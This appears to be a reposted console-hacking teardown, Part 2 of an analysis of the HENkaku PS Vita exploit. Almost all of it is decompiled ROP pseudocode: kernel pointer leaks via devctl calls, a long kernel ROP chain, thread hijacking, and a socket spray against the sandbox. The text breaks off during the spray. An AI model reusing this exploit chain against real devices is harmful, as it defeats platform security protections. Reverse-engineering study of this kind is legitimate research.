Last week we saw Part 1 of the HENkaku Exploit Teardown by an anonymous PS Vita Hacker known as H, and today H returns with Part 2 of his HENkaku Exploit Teardown below from Pastebin.com via notzecoxao! :D

To quote: HENkaku exploit teardown - Part 2

- Stage 3 (ROP payload 2):

The second payload is composed of another ROP chain and data. It creates two userland threads (each one with its own ROP chain), which take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).
Code:
    // Copy SD card device path and param
    strcpy(x_stack + 0x000086B4, "sdstor0:");
    strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");

    // Clear devctl 0x05 outbuf
    // From x_stack + 0x00006F34 to x_stack + 0x00007334
    memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);

    // Copy dummy device path
    strcpy(x_stack + 0x000086E4, "molecule0:");

    // Mount path?
    sceLibKernel_A4AD("molecule0:");

    // Send command 0x05 to "sdstor0:"
    sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

    // Store leaked kernel pointer 1
    // Comes from devctl_outbuf + 0x3D4
    0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9

    // Create "pln" thread
    // "pln" == "pointer leak n"?
    // Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}
    int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

    // Store "pln" thread's ID
    0x00(x_stack + 0x00008E94) = thread_id

    // Store SceKernelThreadInfo size
    0x00(x_stack + 0x0000862C) = 0x7C

    // Get thread info structure
    sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

    // Save pln_threadinfo.stack + 0x00001000
    0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000

    // Stack parameters for "pln" ROP chain
    0x00(x_stack + 0x00008954) = 0x00000014
    0x00(x_stack + 0x00008958) = x_stack + 0x00006F34
    0x00(x_stack + 0x0000895C) = 0x000003FF

    // Stack parameters for "pln" ROP chain
    0x00(x_stack + 0x0000896C) = 0x00000400
    0x00(x_stack + 0x00008970) = 0x00000000
    0x00(x_stack + 0x00008974) = 0x00000000

    // Setup "pln" ROP chain
    0x00(x_stack + 0x00008708) = 0x008DD9B5 
    0x00(x_stack + 0x0000870C) = 0x000086E4
    0x00(x_stack + 0x00008710) = 0x00000000
    0x00(x_stack + 0x00008714) = 0x00000000
    0x00(x_stack + 0x00008718) = 0x00000000
    0x00(x_stack + 0x0000871C) = 0x0000A4AD
    0x00(x_stack + 0x00008720) = 0x00000000
    0x00(x_stack + 0x00008724) = 0x000FCDBB
    0x00(x_stack + 0x00008728) = 0x00000000
    0x00(x_stack + 0x0000872C) = 0x008DD9B5
    0x00(x_stack + 0x00008730) = 0x000086B4
    0x00(x_stack + 0x00008734) = 0x00000005
    0x00(x_stack + 0x00008738) = 0x000086CC
    0x00(x_stack + 0x0000873C) = 0x00008954
    0x00(x_stack + 0x00008740) = 0x0000690C
    0x00(x_stack + 0x00008744) = 0x00000000
    0x00(x_stack + 0x00008748) = 0x000FCDBB
    0x00(x_stack + 0x0000874C) = 0x00000000
    0x00(x_stack + 0x00008750) = 0x008DD9B5
    0x00(x_stack + 0x00008754) = 0x000F4240
    0x00(x_stack + 0x00008758) = 0x00000000
    0x00(x_stack + 0x0000875C) = 0x00000000
    0x00(x_stack + 0x00008760) = 0x00000000
    0x00(x_stack + 0x00008764) = 0x00018544
    0x00(x_stack + 0x00008768) = 0x00000000
    0x00(x_stack + 0x0000876C) = 0x000FCDBB
    0x00(x_stack + 0x00008770) = 0x00000000
    0x00(x_stack + 0x00008774) = 0x008DD9B5
    0x00(x_stack + 0x00008778) = 0x000086B4
    0x00(x_stack + 0x0000877C) = 0x00000005
    0x00(x_stack + 0x00008780) = 0x00007444
    0x00(x_stack + 0x00008784) = 0x0000896C
    0x00(x_stack + 0x00008788) = 0x0000690C
    0x00(x_stack + 0x0000878C) = 0x00000000
    0x00(x_stack + 0x00008790) = 0x000FCDBB
    0x00(x_stack + 0x00008794) = 0x00000000
    0x00(x_stack + 0x00008798) = 0x00000519

    /*
       "pln" ROP

        // Mount path?
        sceLibKernel_A4AD("molecule0:");

        // Send devctl 0x05
        sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

        // Delay for a while
        sceKernelDelayThread(1000000);

        // Send devctl 0x05 again using
        // input buffer from x_stack + 0x00007444 to x_stack + 0x00007844
        sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);

        // Deadlock
        sceWebkit_519();
    */

    // Copy "pln" ROP chain into "pln" thread's stack
    memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);

    // Set stack pointer
    0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0

    // Set PC
    0x00(x_stack + 0x00008834) = 0x000C048B    // POP {PC}

    // Start "pln" thread
    // Thread arguments are loaded into R1 and the gadget
    // at the thread's entrypoint then loads register values
    // from it, overwritting SP and PC and triggering the
    // ROP chain
    sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

    // Delay for a while
    sceKernelDelayThread(100000);

    // Store leaked kernel pointer 2
    // Comes from devctl_outbuf + 0x3C4
    0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544

    // Setup pointer to leaked address in kernel module 1
    0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460

    // Setup pointer to leaked address in kernel module 2
    0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300

    // Setup kernel mode ROP chain
    0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031
    0x00(x_stack + 0x00008A90) = 0x08106803
    0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
    0x00(x_stack + 0x00008A98) = 0x00000038
    0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
    0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571
    0x00(x_stack + 0x00008AAC) = 0x00000000
    0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43
    0x00(x_stack + 0x00008AB4) = 0x00000000
    0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
    0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73
    0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031
    0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913
    0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523
    0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3
    0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067
    0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F
    0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713
    0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D
    0x00(x_stack + 0x00008AF0) = 0x00000000
    0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
    0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603
    0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17
    0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031
    0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913
    0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61
    0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB
    0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571
    0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61
    0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1
    0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411
    0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1
    0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9
    0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411
    0x00(x_stack + 0x00008B48) = 0x00000010
    0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11
    0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3
    0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1
    0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5
    0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
    0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399
    0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399
    0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F
    0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399
    0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913
    0x00(x_stack + 0x00008B8C) = 0x00000000
    0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
    0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861
    0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
    0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399
    0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399
    0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D
    0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3
    0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF
    0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
    0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9
    0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347
    0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9
    0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347
    0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B
    0x00(x_stack + 0x00008C04) = 0x00000000
    0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95
    0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93
    0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411
    0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7
    0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3
    0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411
    0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
    0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B
    0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
    0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49
    0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
    0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B
    0x00(x_stack + 0x00008C5C) = 0x00000040
    0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49
    0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B
    0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B
    0x00(x_stack + 0x00008C64) = 0x00000040
    0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
    0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853
    0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
    0x00(x_stack + 0x00008C80) = 0x00000038
    0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB
    0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1
    0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B
    0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD
    0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1
    0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
    0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117
    0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399
    0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
    0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
    0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B
    0x00(x_stack + 0x00008CC0) = 0x00000040
    0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49
    0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73
    0x00(x_stack + 0x00008CD0) = 0x00000000
    0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD
    0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9
    0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1
    0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117
    0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
    0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067
    0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47
    0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9
    0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33
    0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
    0x00(x_stack + 0x00008D14) = 0x00000000
    0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
    0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73
    0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B
    0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853
    0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
    0x00(x_stack + 0x00008D2C) = 0x08106803
    0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3
    0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433
    0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3
    0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3
    0x00(x_stack + 0x00008D44) = 0x00000000
    0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D
    0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000
    0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853
    0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
    0x00(x_stack + 0x00008D58) = 0x00000000
    0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347
    0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9
    0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605
    0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD
    0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB
    0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853
    0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F

    // Overwrite specific NULLs in the ROP chain
    0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)
    0x00(x_stack + 0x00008B48) = 0x00000090
    0x00(x_stack + 0x00008CC0) = 0x00000240
    0x00(x_stack + 0x00008D58) = 0x00000200
    0x00(x_stack + 0x00008D14) = 0x00008FC0

    // Copy kernel ROP chain
    memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);

    // Copy the first 0x400 bytes of "obfuscated" data
    // and append them at the bottom of the ROP chain
    memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);

    // Set kernel thread SP, PC, UNK
    0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC
    0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004
    0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347

    // Create "mhm" thread
    // "mhm" == "move heap memory"?
    // Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC}
    int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

    // Store "mhm" thread's ID
    0x00(x_stack + 0x00008620) = thread_id

    // Store SceKernelThreadInfo size
    0x00(x_stack + 0x0000862C) = 0x0000007C

    // Get "mhm" thread's info structure
    sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

    // Store mhm_threadinfo.stack + 0x00001000
    0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000

    // Spam sceNetSocket requests
    // sceNetSocket("x", AF_INET, SOCK_STREAM, 0);
    0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000);
